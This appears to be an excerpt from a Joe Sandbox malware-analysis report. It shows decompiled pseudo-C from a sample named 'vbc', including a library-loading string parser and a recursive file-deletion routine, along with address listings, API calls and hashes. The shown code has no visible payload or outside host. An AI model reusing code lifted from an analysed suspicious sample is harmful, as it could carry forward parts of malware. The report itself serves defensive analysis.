								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c24
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405A03 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405A03(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405CCE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2c8 =  *0x42a2c8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406212(0x425730, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C12(_t68);
					} else {
						lstrcatW(0x425730, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425730,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406212(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E004059BB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405371(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2c8 =  *0x42a2c8 + 1;
										} else {
											E00405371(0xfffffff1, _t68);
											E004060B3(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A03(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425730 - 0x5c;
					if( *0x425730 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406555(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405BC6(_t68);
							_t38 = E004059BB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405371(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405371(0xfffffff1, _t68);
							return E004060B3(_t67, _t68, 0);
						}
						L30:
						 *0x42a2c8 =  *0x42a2c8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405a0d
0x00405a12
0x00405a1b
0x00405a1e
0x00405a26
0x00405a29
0x00405a2c
0x00405a34
0x00405a36
0x00405a37
0x00000000
0x00405a37
0x00405a42
0x00405a45
0x00405a45
0x00405a45
0x00405a49
0x00405a5c
0x00405a63
0x00405a68
0x00405a6c
0x00405a7c
0x00405a6e
0x00405a74
0x00405a74
0x00405a81
0x00405a85
0x00405a91
0x00405a97
0x00405a9c
0x00405aa2
0x00405aad
0x00405ab3
0x00405ab5
0x00405ab8
0x00405b62
0x00405b62
0x00405b66
0x00405b68
0x00405b68
0x00405b68
0x00405b68
0x00000000
0x00000000
0x00000000
0x00000000
0x00405abe
0x00405abe
0x00405abe
0x00405ac6
0x00405ae6
0x00405aee
0x00405af3
0x00405afa
0x00405b15
0x00405b1a
0x00405b1c
0x00405b40
0x00405b1e
